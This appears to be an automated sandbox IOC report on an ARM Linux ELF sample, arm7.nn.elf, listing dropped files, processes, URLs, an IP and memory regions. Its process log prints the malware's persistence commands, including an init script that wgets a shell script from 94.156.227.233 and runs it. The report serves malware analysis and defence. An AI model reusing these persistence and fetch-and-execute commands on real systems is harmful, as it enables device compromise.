IOC Report
arm7.nn.elf

loading gif

Files

File Path
Type
Category
Malicious
arm7.nn.elf
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, with debug_info, not stripped
initial sample
malicious
/etc/init.d/arm7.nn.elf
POSIX shell script, ASCII text executable
dropped
malicious
/etc/init.d/system
POSIX shell script, ASCII text executable
dropped
malicious
/etc/profile
ASCII text
dropped
malicious
/etc/rc.local
POSIX shell script, ASCII text executable
dropped
malicious
/boot/bootcmd
ASCII text
dropped
/etc/inittab
ASCII text
dropped
/etc/motd
ASCII text
dropped
/etc/systemd/system/custom.service
ASCII text
dropped
/memfd:snapd-env-generator (deleted)
ASCII text
dropped
/tmp/qemu-open.HDx7SY (deleted)
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
/tmp/arm7.nn.elf
/tmp/arm7.nn.elf
/tmp/arm7.nn.elf
-
/bin/sh
/bin/sh -c "systemctl enable custom.service >/dev/null 2>&1"
/bin/sh
-
/usr/bin/systemctl
systemctl enable custom.service
/tmp/arm7.nn.elf
-
/bin/sh
/bin/sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/system
/tmp/arm7.nn.elf
-
/bin/sh
/bin/sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/system /etc/rcS.d/S99system
/tmp/arm7.nn.elf
-
/bin/sh
/bin/sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm7.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm7.nn.elf'\n /tmp/arm7.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping arm7.nn.elf'\n killall arm7.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm7.nn.elf"
/tmp/arm7.nn.elf
-
/bin/sh
/bin/sh -c "chmod +x /etc/init.d/arm7.nn.elf >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/arm7.nn.elf
/tmp/arm7.nn.elf
-
/bin/sh
/bin/sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
/bin/sh
-
/usr/bin/mkdir
mkdir -p /etc/rc.d
/tmp/arm7.nn.elf
-
/bin/sh
/bin/sh -c "ln -s /etc/init.d/arm7.nn.elf /etc/rc.d/S99arm7.nn.elf >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/arm7.nn.elf /etc/rc.d/S99arm7.nn.elf
/tmp/arm7.nn.elf
-
/tmp/arm7.nn.elf
-
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/systemd/systemd
-
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
There are 27 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s
unknown
http://94.156.227.233/
unknown

IPs

IP
Domain
Country
Malicious
94.156.227.234
unknown
Bulgaria

Memdumps

Base Address
Regiontype
Protect
Malicious
7f6740032000
page execute read
malicious
55c455b11000
page execute read
55c457d80000
page read and write
7f68455ad000
page read and write
7f6844f55000
page read and write
7f68455d1000
page read and write
7f68450c1000
page read and write
7f68448d3000
page read and write
55c457d69000
page execute and read and write
7f6844f32000
page read and write
55c458b2c000
page read and write
7f6844cc7000
page read and write
7ffc9d1fa000
page execute read
7f68440cb000
page read and write
7f68452a3000
page read and write
7f6840021000
page read and write
7f674003a000
page read and write
7f683ffff000
page read and write
7f6845616000
page read and write
55c455d6b000
page read and write
7f6844965000
page read and write
7f674003f000
page read and write
7ffc9d118000
page read and write
7f6845484000
page read and write
55c455d62000
page read and write
There are 15 hidden memdumps, click here to show them.